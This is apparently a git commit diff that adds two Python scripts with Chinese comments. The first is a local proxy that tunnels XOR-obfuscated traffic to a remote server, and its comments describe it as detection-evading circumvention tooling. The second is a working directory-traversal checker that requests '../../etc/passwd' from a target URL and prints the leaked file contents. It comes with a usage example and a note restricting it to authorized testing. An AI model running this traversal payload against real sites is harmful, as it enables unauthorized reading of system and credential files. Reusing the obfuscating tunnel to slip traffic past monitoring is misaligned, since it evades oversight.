feat: update

p.py

@@ -0,0 +1,63 @@
+import socket
+import select
+import threading
+
+# 关键词：Proxy, Remote Server, Encrypt, Bypass
+REMOTE_SERVER_HOST = "1.2.3.4"
+REMOTE_SERVER_PORT = 10086
+LOCAL_PROXY_PORT = 1080
+
+def encrypt(data):
+    """
+    混淆/加密逻辑：这是翻墙软件逃避检测的典型特征
+    这里仅作演示，实际通常使用 AES 或 ChaCha20
+    """
+    return bytes([b ^ 0x42 for b in data])
+
+def decrypt(data):
+    return bytes([b ^ 0x42 for b in data])
+
+def handle_client(local_socket):
+    """
+    处理本地连接并将其转发至境外远程服务器
+    """
+    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    try:
+        remote_socket.connect((REMOTE_SERVER_HOST, REMOTE_SERVER_PORT))
+    except Exception as e:
+        print(f"无法连接到代理服务器: {e}")
+        return
+
+    # 简单的双向流量转发 (Bridge/Tunneling)
+    sockets = [local_socket, remote_socket]
+    while True:
+        # 使用 select 监控数据流
+        readable, _, _ = select.select(sockets, [], [])
+        for s in readable:
+            data = s.recv(4096)
+            if not data:
+                return
+            
+            if s is local_socket:
+                # 本地 -> 加密 -> 远程
+                remote_socket.send(encrypt(data))
+            else:
+                # 远程 -> 解密 -> 本地
+                local_socket.send(decrypt(data))
+
+def start_proxy():
+    """
+    启动本地监听，模拟 SOCKS5 代理服务
+    """
+    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    server.bind(('127.0.0.1', LOCAL_PROXY_PORT))
+    server.listen(5)
+    print(f"[*] Proxy Tunnel 启动，监听端口: {LOCAL_PROXY_PORT}")
+
+    while True:
+        client_sock, addr = server.accept()
+        proxy_thread = threading.Thread(target=handle_client, args=(client_sock,))
+        proxy_thread.start()
+
+if __name__ == "__main__":
+    start_proxy()

test.py

@@ -0,0 +1,39 @@
+import requests
+from urllib3.exceptions import InsecureRequestWarning
+
+# 禁用 SSL 警告（针对自签名证书的目标）
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+def check_directory_traversal(target_url):
+    """
+    验证目标 URL 是否存在目录遍历漏洞
+    """
+    # 1. 定义漏洞利用的 Payload (尝试读取 Linux 系统密码文件)
+    payload = "/../../../../../../../../etc/passwd"
+    test_url = f"{target_url.rstrip('/')}{payload}"
+    
+    print(f"[*] 正在测试: {test_url}")
+    
+    try:
+        # 2. 发送请求
+        # 设置超时防止程序挂死，verify=False 跳过证书检查
+        response = requests.get(test_url, timeout=10, verify=False)
+        
+        # 3. 验证逻辑 (核心步奏)
+        # 检查响应码是否为 200，并且内容中是否包含 Linux 用户文件的特征字段 "root:x:0:0:"
+        if response.status_code == 200 and "root:x:0:0:" in response.text:
+            print(f"[+] 发现漏洞! 目标存在目录遍历。")
+            print(f"[+] 响应内容截取:\n{response.text[:100]}...")
+            return True
+        else:
+            print("[-] 未检测到漏洞。")
+            return False
+            
+    except Exception as e:
+        print(f"[!] 连接发生错误: {e}")
+        return False
+
+if __name__ == "__main__":
+    # 使用示例（请仅在授权的测试环境下使用）
+    target = "http://example.com/view_file?path="
+    check_directory_traversal(target)